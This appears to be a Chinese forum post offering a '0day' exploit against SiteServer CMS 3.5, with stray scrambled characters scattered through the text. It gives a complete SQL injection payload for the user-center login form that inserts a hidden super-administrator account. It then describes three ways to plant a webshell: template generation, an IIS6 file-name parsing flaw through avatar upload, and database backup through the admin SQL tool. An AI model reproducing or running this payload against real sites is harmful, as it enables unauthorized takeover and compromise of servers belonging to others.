SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版

; m2 T+ j. v- T; T) t) l+ K0 Fstieserver官网:www.siteserver.cn
) C/ j9 Q# h0 s9 U: J


: C4 E( {8 J. z1 V) C4 xEXP:

直接访问UserCenter/login.aspx
) I$ c) T. M9 Q, }3 }  G; p
2 D" c+ v9 E6 G" H7 s
1 R) \0 d" x/ a$ _; E
2 b, G: D, L' c" P7 j3 V( n用户名处输入：
% N) j* }% j6 Z! l' y
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
6 g6 N0 }7 E3 O6 Y/ T" e
) [2 d" x* {) B( c! ?
% o/ O! a9 R$ n1 M) }3 l' u
密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。

5 ?& P0 [6 {3 k* W% C) W# o
. q* J: P# o) p  M! j0 A8 j
7 w) U# c6 U$ c之后再访问后台SiteServer/login.aspx用插入的用户登陆
; U7 h# L8 R; l) W( f' T
% M6 O& ^3 x2 X% X6 S8 a6 e2 e) L
. X' L& }' D/ u% S
后台拿webshell的三种方法：
; T0 m% N3 K6 A1 T: H
一、

站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx

- ?: a6 y/ d5 @% B( W" q) x二、
& F) o! @/ S) R- i( o
成员权限-》添加用户-》用户名为：1.asp
9 s9 b" T, Y& F5 v
2 _! i- {6 S0 L6 J, n. P, h6 ~http://127.0.0.1/usercenter/

用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell
% j/ d3 c2 ?" N6 r( c# k( a. N
+ w/ o! S: O" B1 H( L/ h9 X7 _3 n. ~（ps：后台添加用户时不会验证是否含有非法字符）

三、

4 V7 c2 ^9 ~4 q4 q# \7 A; \( o系统工具-》实用工具-》机器参数查看
可以看到数据库类型、名称，WEB路径
+ f/ F0 r! q7 X" D  C
系统工具-》数据库工具-》SQL语句查询
这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。
! ~# ~8 M6 k: _$ g. y, Z
$ E" b$ P8 ?8 l: f/ o